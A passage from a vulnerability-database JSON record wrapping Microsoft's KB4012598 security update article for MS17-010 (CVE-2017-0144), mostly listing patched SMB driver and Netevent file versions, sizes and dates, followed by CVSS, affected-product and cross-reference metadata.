applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:16</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,952</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>248,320</td><td>03-Aug-2016</td><td>17:02</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>261,120</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,152</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>231,936</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>233,984</td><td>11-Feb-2017</td><td>17:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>239,104</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>289,792</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>263,168</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:37</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:42</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:41</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,952</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>248,320</td><td>11-Feb-2017</td><td>17:37</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>261,120</td><td>11-Feb-2017</td><td>17:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,152</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>231,936</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>16:23</td><td>x64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:41</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>448,512</td><td>11-Feb-2017</td><td>15:48</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>448,000</td><td>11-Feb-2017</td><td>15:44</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>176,128</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>178,176</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x86-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>103,936</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>103,936</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>304,640</td><td>11-Feb-2017</td><td>15:22</td><td>x86</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>305,152</td><td>11-Feb-2017</td><td>15:19</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>146,432</td><td>03-Aug-2016</td><td>14:20</td><td>x86</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:18</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink></body></html>", "published": "2017-03-14T00:25:04", "modified": "2017-03-14T17:40:16", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://support.microsoft.com/en-us/help/4012598/", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0144"], "immutableFields": [], "lastseen": "2019-10-05T22:48:35", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"modified": "2019-10-05T22:48:35", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ANALYZE/JTR_WINDOWS_FAST", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["CVE-2017-0144"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-10-05T22:48:35", "value": 6.8, "vector": "NONE"}}, "objectVersion": "1.5", "kb": "KB4012598", "msrc": "MS17-010", "mscve": "CVE-2017-0144", "msplatform": "", "msfamily": "Windows", "msimpact": "", "msseverity": "", "superseeds": [], "parentseeds": [], "msproducts": ["13230", "14113", "13228", "11721", "14210", "11728", "11740", "11733", "11719", "13236", "13233", "14440", "13234", "11708"], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "f62ed778-6986-d76e-c007-40a28315ffbf", "928d79ba-72eb-762f-39be-122173e95922", "fd3a2888-0af1-3691-5303-bc85b4302e62", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "2b2eeb95-d89c-6614-0db5-88f09133ede6"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "name": "Windows Server 2008", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": 